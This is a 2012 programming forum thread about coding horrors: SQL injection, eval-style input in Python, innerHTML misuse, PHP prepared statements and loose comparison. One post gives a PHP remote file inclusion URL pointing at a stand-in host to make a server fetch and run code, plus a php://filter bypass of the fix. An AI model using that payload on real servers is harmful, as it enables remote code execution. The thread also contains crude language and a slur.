|
Look Around You posted:The fact that SQL queries even are strings in the first place is pretty horrible. Using a binary API like most other things would be exponentially better. Well, we're talking about SQL as if it's a product by a company, like SQLSoft SuperSQL 3.73. It's not. SQL is a query language specification that's implemented in different ways by different vendors.
|
#
?
Oct 13, 2012 16:20
|
|
|
|
| # ? May 27, 2024 13:08 |
|
|
I think I sort of get it. Could you get into the same sort of situation with another language? Like if you try to use Python's exec() in silly ways.
|
|
#
?
Oct 13, 2012 16:23
|
|
|
Look Around You posted:The fact that SQL queries even are strings in the first place is pretty horrible. Using a binary API like most other things would be exponentially better. Those making the (early) DBMS would probably still have provided some sort of commandline for querying and manipulating the database, and stupid developers would probably end up calling that commandline interface in some terrible way even if it wasn't an official API. Markovnikov posted:I think I sort of get it. Could you get into the same sort of situation with another language? Like if you try to use Python's exec() in silly ways. Another PHP classic: PHP code:
|
|
#
?
Oct 13, 2012 16:25
|
|
|
Look Around You posted:The fact that SQL queries even are strings in the first place is pretty horrible. Using a binary API like most other things would be exponentially better. Mustach posted:Maybe they used a crit-bit tree. (probably not)
|
|
#
?
Oct 13, 2012 16:28
|
|
|
Markovnikov posted:I think I sort of get it. Could you get into the same sort of situation with another language? Like if you try to use Python's exec() in silly ways. Yep, if you write a python 2 app that ever uses input(), people can feed python code and it'll be executed. (input() is a wrapper around eval(raw_input()) or something silly like that).
|
|
#
?
Oct 13, 2012 16:27
|
|
|
Markovnikov posted:I think I sort of get it. Could you get into the same sort of situation with another language? Like if you try to use Python's exec() in silly ways. Or any other case where you take user input that is interpreted somehow. Format strings for example.
|
|
#
?
Oct 13, 2012 16:28
|
|
|
e: redacted
|
|
#
?
Oct 13, 2012 16:30
|
|
|
Ephphatha posted:Yep, if you write a python 2 app that ever uses input(), people can feed python code and it'll be executed. (input() is a wrapper around eval(raw_input()) or something silly like that). I think I tried that in interactive mode a while ago and couldn't get Python to gently caress up. It seemed to properly escape sequences in strings and would choke on/error out stuff that wasn't directly a string.
|
|
#
?
Oct 13, 2012 16:31
|
|
|
Markovnikov posted:I think I tried that in interactive mode a while ago and couldn't get Python to gently caress up. It seemed to properly escape sequences in strings and would choke on/error out stuff that wasn't directly a string. It's definitely bad. Ephphatha is right, it's literally just eval(raw_input()), so of course it'll still error stuff, but if you do something like this, well... (Crossposting from another thread from a few months back) 
|
|
#
?
Oct 13, 2012 17:41
|
|
|
nielsm posted:Another PHP classic: Even better: shitcode.php?page=http://mysite.com/mycode.txt. That PHP server downloaded and executed the PHP code inside that file. They "fixed" this by disallowing http/https/ftp protocols (the allow_url_include setting, WHY IS THAT A SETTING?) but forgot to disable it for php:// URLs, so you can still exploit it if you do php://filter/resource=http://mysite.com/mycode.txt. nielsm posted:Those making the (early) DBMS would probably still have provided some sort of commandline for querying and manipulating the database, and stupid developers would probably end up calling that commandline interface in some terrible way even if it wasn't an official API. But then it's not SQL injection anymore, so problem solved! (Yeah, Verizon had a ton of these where bugs were transformed from one kind to another: "OK, fixed the SQL injection" "You introduced a shell injection!" "File a new bug, please. SQL injection is fixed") Look Around You posted:The fact that SQL queries even are strings in the first place is pretty horrible. Using a binary API like most other things would be exponentially better. For the longest time, sending your logic and data in SQL separately didn't exist. It was meant to be more of a report and data entry language, where the guy writing SQL statements was entering the data manually. I don't think the strings are the problem. The big reason for horrors is that it's just that PHP doesn't easily support prepared statements in MySQL. Markovnikov posted:I think I tried that in interactive mode a while ago and couldn't get Python to gently caress up. It seemed to properly escape sequences in strings and would choke on/error out stuff that wasn't directly a string. code:
|
|
#
?
Oct 13, 2012 17:46
|
|
|
I feel the same way about document.write/innerHTML. Pretend that html is a binary file format and create DOM nodes and hook them into the tree and suddenly html escaping stops being a thing that you can even get wrong. 
|
|
#
?
Oct 13, 2012 20:53
|
|
|
Did I mention I'm really bad at shell scripting too?
|
|
#
?
Oct 13, 2012 20:55
|
|
|
Vanadium posted:I feel the same way about document.write/innerHTML. Pretend that html is a binary file format and create DOM nodes and hook them into the tree and suddenly html escaping stops being a thing that you can even get wrong. Use innerHTML when you have a static piece of HTML code you want to insert somewhere. Use textContent/innerText when you want to change the text in an existing element. Never use document.write.
|
|
#
?
Oct 13, 2012 21:08
|
|
|
Vanadium posted:I feel the same way about document.write/innerHTML. Pretend that html is a binary file format and create DOM nodes and hook them into the tree and suddenly html escaping stops being a thing that you can even get wrong. It's handy to have the parser on-hand. I don't know of any other way to parse a snippet of HTML other than creating a document fragment, setting innerHTML, and then chomping the resulting DOM. If anybody knows a better way, I'd be happy to hear it. I'm so looking forward to DOM Subtrees.
|
|
#
?
Oct 13, 2012 21:14
|
|
|
Wheany posted:Never use document.write. It has it's place, but it's very easy to abuse. (and if you are worried about reflows with document.write, you should worry anyway) Funking Giblet fucked around with this message at 21:59 on Oct 13, 2012 |
|
#
?
Oct 13, 2012 21:56
|
|
|
Funking Giblet posted:It has it's place, but it's very easy to abuse. Something that does something different depending on whether the page is reloaded is not a thing you should be using. Firefox also goes into a giant slow path whenever document.write is used.
|
|
#
?
Oct 13, 2012 22:15
|
|
|
Suspicious Dish posted:I don't think the strings are the problem. The big reason for horrors is that it's just that PHP doesn't easily support prepared statements in MySQL.
|
|
#
?
Oct 14, 2012 00:07
|
|
|
Plorkyeran posted:It's supported them for years. The horror here is that people still use PHP 4 (or use PHP 5 as if it was PHP 4). Where? I can't find any API for it.
|
|
#
?
Oct 14, 2012 00:12
|
|
|
Suspicious Dish posted:Where? I can't find any API for it. http://www.php.net/manual/en/mysqli.quickstart.prepared-statements.php
|
|
#
?
Oct 14, 2012 00:15
|
|
|
Ah, I was checking the old mysql functional interface plugin thingy.
|
|
#
?
Oct 14, 2012 01:03
|
|
|
If you're on PHP5, you should really be using PDO if at all possible. Unfortunately for me, PDO is horribly broken on Linux trying to talk to MSSQL using the SQL Native Driver. 
|
|
#
?
Oct 14, 2012 07:51
|
|
|
Shame Boner posted:Rather than argue with the boss about why this was check was unnecessary and stupid, I rewrote the script to do something like use tree to list all directories on the filesystem and did a line-by-line pattern match on them. It'd do the same check in about 6 seconds. code:Look Around You posted:The fact that SQL queries even are strings in the first place is pretty horrible. Using a binary API like most other things would be exponentially better.  ", at which point they might even use a semi-intelligent library for query construction."full disclosure posted:*Description of Issue*
|
|
#
?
Oct 15, 2012 16:27
|
|
|
beoba posted:Reading this is like watching a trainwreck that just gets worse with every mixed metaphor. Based on my experiences Santander are pretty incompetent in a lot of areas, not just IT security.
|
|
#
?
Oct 15, 2012 16:31
|
|
|
let's build well formed xml from string templates! http://webgun.io/articles/templated-webhooks it's ok, everyone uses utf-8 and character escaping isn't a real world issue
|
|
#
?
Oct 15, 2012 16:36
|
|
|
Hammerite posted:Based on my experiences Santander are pretty incompetent in a lot of areas, not just IT security. It's cool though. In Europe they now have to provide a notice that they're storing all this information insecurely in a cookie.
|
|
#
?
Oct 15, 2012 17:20
|
|
|
tef posted:let's build well formed xml from string templates! I wonder what would happen if your name has a strange character in it like a " or &. Those do exist, by the way.
|
|
#
?
Oct 15, 2012 17:54
|
|
|
So I saw a homegrown PHP CMS today. For some reason, if your password is like "000015", you can only log in with "15" as the password, and 000015 is "invalid password" but strings work as expected What the hell would cause this?
|
|
#
?
Oct 15, 2012 18:50
|
|
|
Biowarfare posted:So I saw a homegrown PHP CMS today. Probably using == instead of ===?
|
|
#
?
Oct 15, 2012 18:55
|
|
|
Looks like the string is being coerced to a number 'automagically', therefore the 0000 is being dropped.
|
|
#
?
Oct 15, 2012 19:01
|
|
|
Look Around You posted:The fact that SQL queries even are strings in the first place is pretty horrible. Using a binary API like most other things would be exponentially better. Programs in most languages are just strings but the difference is people don't usually build C source code by concatenating arbitrary user input together. seiken fucked around with this message at 20:21 on Oct 15, 2012 |
|
#
?
Oct 15, 2012 20:18
|
|
|
Suspicious Dish posted:I wonder what would happen if your name has a strange character in it like a " or &. Those do exist, by the way. it seems trivial for the template engine to escape these to the entities (& quot; and & amp;)
|
|
#
?
Oct 15, 2012 21:51
|
|
|
Suspicious Dish posted:I wonder what would happen if your name has a strange character in it like a " or &. Those do exist, by the way. I was thinking about changing part of my name to an & Yeah, partly so I could go all Bobby Tables on different services I use.
|
|
#
?
Oct 15, 2012 21:58
|
|
|
Munkeymon posted:I was thinking about changing part of my name to an & Not unprecedented.
|
|
#
?
Oct 15, 2012 22:09
|
|
|
seiken posted:Programs in most languages are just strings but the difference is people don't usually build C source code by concatenating arbitrary user input together. Well yeah that was kind of my point. Instead of a glorified eval, I'm thinking that something along the lines of a strict library function call interface. As in instead of code:It'd probably be pretty impractical though. e: To clarify, I mean that all of the actual actions would be library calls and the data parameters that you're giving it would be strings. Look Around You fucked around with this message at 03:42 on Oct 16, 2012 |
|
#
?
Oct 16, 2012 03:39
|
|
|
Look Around You posted:Well yeah that was kind of my point. Instead of a glorified eval, I'm thinking that something along the lines of a strict library function call interface. yea, take your idea to its logical conclusion and you end up with SQL
|
|
#
?
Oct 16, 2012 04:00
|
|
|
Bunny Cuddlin posted:yea, take your idea to its logical conclusion and you end up with SQL Yeah, exactly. I just wish it weren't as easy to concatenate queries out of strings to make it less likely that people just throw poo poo together into queries but I know that it's sort of not feasible.
|
|
#
?
Oct 16, 2012 04:02
|
|
|
Doctor w-rw-rw- posted:One thing that is related but not quite code: users don't understand what it means to develop an application. Read the Planetside 2 thread in games to watch people poo poo themselves throw it at the developers over bugs in a beta test, where - wait for it - they're being asked to find bugs. Granted, there have been some recurring bugs that indicate they don't have great regression testing, but this is the games industry, so I'm not at all surprised based on stories I've read.
|
|
#
?
Oct 16, 2012 04:17
|
|
|
tef posted:I was once informed of a hash table, where to store a key/value pair, they first concatenated the key to the value (they were both strings), and then to lookup, it did a prefix search over the hash table entries. If all you have is a hammer, every problem looks like a nail. Or a prefix search. I'm very new to coding, but I'm loving this thread.
|
|
#
?
Oct 16, 2012 04:39
|
|
|
Is it a common thing to store data that will be used hours later, from a different procedure, running from another machine, in a temp table? I had to restart our SQL services on a machine and now a package from another machine is failing because there is no temp table to grab data from and I have no ideal what populates that data in the first place  Coding horror?
|
|
#
?
Oct 16, 2012 07:25
|
|
|
|
| # ? May 27, 2024 13:08 |
|
|
Doctor w-rw-rw- posted:One thing that is related but not quite code: users don't understand what it means to develop an application. "Great app, but it should be on iPad too. 1 star." "I bought this and it doesn't do <something it isn't designed for>. 2 stars." "Switched to an iPhone and can't use the app? Scam! 1 star." There's no way to purge lovely reviews off either so it's burned to the ground for life because of these retards.
|
|
#
?
Oct 16, 2012 10:17
|
|
